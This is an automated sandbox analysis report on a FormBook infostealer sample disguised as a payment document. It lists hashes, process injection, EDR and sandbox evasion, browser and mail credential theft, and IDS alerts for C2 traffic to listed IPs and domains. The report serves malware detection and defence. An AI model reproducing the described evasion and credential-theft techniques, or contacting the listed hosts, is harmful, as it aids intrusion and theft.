Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payment&WarantyBonds.exe

Overview

General Information

Sample name:Payment&WarantyBonds.exe
(renamed file extension from bat to exe)
Original sample name:Payment&WarantyBonds.bat
Analysis ID:1545186
MD5:a9da1b42f6ad80ee6085f69e6c25f49b
SHA1:e7f51c3eb496a278999fd893e1fcfca8a685f854
SHA256:4e6fe41b2158546ebc7d5dcfe13aa832e3ce5025b36e0cfcc9d7f373e1a0a089
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Payment&WarantyBonds.exe (PID: 6900 cmdline: "C:\Users\user\Desktop\Payment&WarantyBonds.exe" MD5: A9DA1B42F6AD80EE6085F69E6C25F49B)
    • Payment&WarantyBonds.exe (PID: 6572 cmdline: "C:\Users\user\Desktop\Payment&WarantyBonds.exe" MD5: A9DA1B42F6AD80EE6085F69E6C25F49B)
      • oDnyHukDVUZk.exe (PID: 6100 cmdline: "C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • systeminfo.exe (PID: 1236 cmdline: "C:\Windows\SysWOW64\systeminfo.exe" MD5: 36CCB1FFAFD651F64A22B5DA0A1EA5C5)
          • oDnyHukDVUZk.exe (PID: 3804 cmdline: "C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5856 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.4148413603.0000000000B70000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.2063986251.0000000001740000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.4148359872.0000000000B20000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000002.00000002.2062501078.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.Payment&WarantyBonds.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.Payment&WarantyBonds.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-30T08:10:32.954880+010020507451Malware Command and Control Activity Detected192.168.2.4497413.33.130.19080TCP
                2024-10-30T08:10:57.668868+010020507451Malware Command and Control Activity Detected192.168.2.449840103.120.80.11180TCP
                2024-10-30T08:11:11.413201+010020507451Malware Command and Control Activity Detected192.168.2.449918217.160.0.6080TCP
                2024-10-30T08:11:25.122859+010020507451Malware Command and Control Activity Detected192.168.2.450000161.97.142.14480TCP
                2024-10-30T08:11:38.753227+010020507451Malware Command and Control Activity Detected192.168.2.45002313.248.169.4880TCP
                2024-10-30T08:11:52.581487+010020507451Malware Command and Control Activity Detected192.168.2.450027198.251.84.20080TCP
                2024-10-30T08:12:06.047015+010020507451Malware Command and Control Activity Detected192.168.2.450031172.67.154.6780TCP
                2024-10-30T08:12:22.879079+010020507451Malware Command and Control Activity Detected192.168.2.45003520.2.249.780TCP
                2024-10-30T08:12:37.957230+010020507451Malware Command and Control Activity Detected192.168.2.450039203.161.49.19380TCP
                2024-10-30T08:12:51.443226+010020507451Malware Command and Control Activity Detected192.168.2.450043199.59.243.22780TCP
                2024-10-30T08:13:05.362313+010020507451Malware Command and Control Activity Detected192.168.2.450047217.76.156.25280TCP
                2024-10-30T08:13:19.252594+010020507451Malware Command and Control Activity Detected192.168.2.450051144.76.190.3980TCP
                2024-10-30T08:13:33.174085+010020507451Malware Command and Control Activity Detected192.168.2.45005534.92.128.5980TCP
                2024-10-30T08:13:46.940067+010020507451Malware Command and Control Activity Detected192.168.2.450059152.42.255.4880TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-30T08:10:32.954880+010028554651A Network Trojan was detected192.168.2.4497413.33.130.19080TCP
                2024-10-30T08:10:57.668868+010028554651A Network Trojan was detected192.168.2.449840103.120.80.11180TCP
                2024-10-30T08:11:11.413201+010028554651A Network Trojan was detected192.168.2.449918217.160.0.6080TCP
                2024-10-30T08:11:25.122859+010028554651A Network Trojan was detected192.168.2.450000161.97.142.14480TCP
                2024-10-30T08:11:38.753227+010028554651A Network Trojan was detected192.168.2.45002313.248.169.4880TCP
                2024-10-30T08:11:52.581487+010028554651A Network Trojan was detected192.168.2.450027198.251.84.20080TCP
                2024-10-30T08:12:06.047015+010028554651A Network Trojan was detected192.168.2.450031172.67.154.6780TCP
                2024-10-30T08:12:22.879079+010028554651A Network Trojan was detected192.168.2.45003520.2.249.780TCP
                2024-10-30T08:12:37.957230+010028554651A Network Trojan was detected192.168.2.450039203.161.49.19380TCP
                2024-10-30T08:12:51.443226+010028554651A Network Trojan was detected192.168.2.450043199.59.243.22780TCP
                2024-10-30T08:13:05.362313+010028554651A Network Trojan was detected192.168.2.450047217.76.156.25280TCP
                2024-10-30T08:13:19.252594+010028554651A Network Trojan was detected192.168.2.450051144.76.190.3980TCP
                2024-10-30T08:13:33.174085+010028554651A Network Trojan was detected192.168.2.45005534.92.128.5980TCP
                2024-10-30T08:13:46.940067+010028554651A Network Trojan was detected192.168.2.450059152.42.255.4880TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-30T08:10:50.202498+010028554641A Network Trojan was detected192.168.2.449794103.120.80.11180TCP
                2024-10-30T08:10:52.752803+010028554641A Network Trojan was detected192.168.2.449810103.120.80.11180TCP
                2024-10-30T08:10:55.113557+010028554641A Network Trojan was detected192.168.2.449826103.120.80.11180TCP
                2024-10-30T08:11:03.748001+010028554641A Network Trojan was detected192.168.2.449876217.160.0.6080TCP
                2024-10-30T08:11:06.297814+010028554641A Network Trojan was detected192.168.2.449890217.160.0.6080TCP
                2024-10-30T08:11:08.869961+010028554641A Network Trojan was detected192.168.2.449904217.160.0.6080TCP
                2024-10-30T08:11:17.480354+010028554641A Network Trojan was detected192.168.2.449954161.97.142.14480TCP
                2024-10-30T08:11:20.001402+010028554641A Network Trojan was detected192.168.2.449969161.97.142.14480TCP
                2024-10-30T08:11:22.550127+010028554641A Network Trojan was detected192.168.2.449985161.97.142.14480TCP
                2024-10-30T08:11:30.980430+010028554641A Network Trojan was detected192.168.2.45002013.248.169.4880TCP
                2024-10-30T08:11:33.545456+010028554641A Network Trojan was detected192.168.2.45002113.248.169.4880TCP
                2024-10-30T08:11:36.187303+010028554641A Network Trojan was detected192.168.2.45002213.248.169.4880TCP
                2024-10-30T08:11:44.898287+010028554641A Network Trojan was detected192.168.2.450024198.251.84.20080TCP
                2024-10-30T08:11:47.490413+010028554641A Network Trojan was detected192.168.2.450025198.251.84.20080TCP
                2024-10-30T08:11:49.932895+010028554641A Network Trojan was detected192.168.2.450026198.251.84.20080TCP
                2024-10-30T08:11:58.333652+010028554641A Network Trojan was detected192.168.2.450028172.67.154.6780TCP
                2024-10-30T08:12:00.880361+010028554641A Network Trojan was detected192.168.2.450029172.67.154.6780TCP
                2024-10-30T08:12:03.455281+010028554641A Network Trojan was detected192.168.2.450030172.67.154.6780TCP
                2024-10-30T08:12:15.299563+010028554641A Network Trojan was detected192.168.2.45003220.2.249.780TCP
                2024-10-30T08:12:17.871433+010028554641A Network Trojan was detected192.168.2.45003320.2.249.780TCP
                2024-10-30T08:12:20.486991+010028554641A Network Trojan was detected192.168.2.45003420.2.249.780TCP
                2024-10-30T08:12:30.309501+010028554641A Network Trojan was detected192.168.2.450036203.161.49.19380TCP
                2024-10-30T08:12:32.868097+010028554641A Network Trojan was detected192.168.2.450037203.161.49.19380TCP
                2024-10-30T08:12:35.417291+010028554641A Network Trojan was detected192.168.2.450038203.161.49.19380TCP
                2024-10-30T08:12:43.809745+010028554641A Network Trojan was detected192.168.2.450040199.59.243.22780TCP
                2024-10-30T08:12:46.357760+010028554641A Network Trojan was detected192.168.2.450041199.59.243.22780TCP
                2024-10-30T08:12:48.895001+010028554641A Network Trojan was detected192.168.2.450042199.59.243.22780TCP
                2024-10-30T08:12:57.609084+010028554641A Network Trojan was detected192.168.2.450044217.76.156.25280TCP
                2024-10-30T08:13:00.169619+010028554641A Network Trojan was detected192.168.2.450045217.76.156.25280TCP
                2024-10-30T08:13:02.751785+010028554641A Network Trojan was detected192.168.2.450046217.76.156.25280TCP
                2024-10-30T08:13:11.643333+010028554641A Network Trojan was detected192.168.2.450048144.76.190.3980TCP
                2024-10-30T08:13:14.252584+010028554641A Network Trojan was detected192.168.2.450049144.76.190.3980TCP
                2024-10-30T08:13:16.688104+010028554641A Network Trojan was detected192.168.2.450050144.76.190.3980TCP
                2024-10-30T08:13:25.393989+010028554641A Network Trojan was detected192.168.2.45005234.92.128.5980TCP
                2024-10-30T08:13:28.199291+010028554641A Network Trojan was detected192.168.2.45005334.92.128.5980TCP
                2024-10-30T08:13:30.545952+010028554641A Network Trojan was detected192.168.2.45005434.92.128.5980TCP
                2024-10-30T08:13:39.287979+010028554641A Network Trojan was detected192.168.2.450056152.42.255.4880TCP
                2024-10-30T08:13:41.851526+010028554641A Network Trojan was detected192.168.2.450057152.42.255.4880TCP
                2024-10-30T08:13:44.467456+010028554641A Network Trojan was detected192.168.2.450058152.42.255.4880TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: Payment&WarantyBonds.exeReversingLabs: Detection: 23%
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.Payment&WarantyBonds.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.Payment&WarantyBonds.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000007.00000002.4148413603.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2063986251.0000000001740000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4148359872.0000000000B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2062501078.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4150364860.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4148377228.0000000002EC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2064136057.00000000021E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: Payment&WarantyBonds.exeJoe Sandbox ML: detected
                Source: Payment&WarantyBonds.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Payment&WarantyBonds.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: sysinfo.pdb source: Payment&WarantyBonds.exe, 00000002.00000002.2062877202.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, oDnyHukDVUZk.exe, 00000006.00000002.4147696582.0000000000818000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: sysinfo.pdbGCTL source: Payment&WarantyBonds.exe, 00000002.00000002.2062877202.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, oDnyHukDVUZk.exe, 00000006.00000002.4147696582.0000000000818000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: oDnyHukDVUZk.exe, 00000006.00000002.4147995475.0000000000A0E000.00000002.00000001.01000000.0000000C.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4147962601.0000000000A0E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: Payment&WarantyBonds.exe, 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2068016060.0000000004586000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2065768682.00000000043D0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Payment&WarantyBonds.exe, Payment&WarantyBonds.exe, 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, systeminfo.exe, 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2068016060.0000000004586000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2065768682.00000000043D0000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 7_2_0056C500 FindFirstFileW,FindNextFileW,FindClose,7_2_0056C500
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 4x nop then xor eax, eax7_2_00559E20
                Source: C:\Windows\SysWOW64\systeminfo.exeCode function: 4x nop then mov ebx, 00000004h7_2_046504DE

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49741 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49741 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49794 -> 103.120.80.111:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49826 -> 103.120.80.111:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49840 -> 103.120.80.111:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49840 -> 103.120.80.111:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49890 -> 217.160.0.60:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49810 -> 103.120.80.111:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49876 -> 217.160.0.60:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49918 -> 217.160.0.60:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49969 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49918 -> 217.160.0.60:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49954 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50023 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50024 -> 198.251.84.200:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50032 -> 20.2.249.7:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50023 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50028 -> 172.67.154.67:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 198.251.84.200:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50036 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50037 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50033 -> 20.2.249.7:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50042 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50049 -> 144.76.190.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50052 -> 34.92.128.59:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50051 -> 144.76.190.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50020 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50051 -> 144.76.190.39:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49985 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50044 -> 217.76.156.252:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50056 -> 152.42.255.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50040 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50050 -> 144.76.190.39:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50031 -> 172.67.154.67:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50053 -> 34.92.128.59:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50046 -> 217.76.156.252:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50059 -> 152.42.255.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50059 -> 152.42.255.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50031 -> 172.67.154.67:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50045 -> 217.76.156.252:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50047 -> 217.76.156.252:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50027 -> 198.251.84.200:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50041 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50027 -> 198.251.84.200:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50022 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50038 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50047 -> 217.76.156.252:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50057 -> 152.42.255.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49904 -> 217.160.0.60:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50043 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50043 -> 199.59.243.227:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50026 -> 198.251.84.200:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50034 -> 20.2.249.7:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50054 -> 34.92.128.59:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50021 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50029 -> 172.67.154.67:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50035 -> 20.2.249.7:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50035 -> 20.2.249.7:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50058 -> 152.42.255.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50030 -> 172.67.154.67:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50039 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50039 -> 203.161.49.193:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50000 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50000 -> 161.97.142.144:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50055 -> 34.92.128.59:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50055 -> 34.92.128.59:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50048 -> 144.76.190.39:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.030002059.xyz
                Source: DNS query: www.xipowerplay.xyz
                Source: DNS query: www.091210.xyz
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewIP Address: 20.2.249.7 20.2.249.7
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: Joe Sandbox ViewASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
                Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
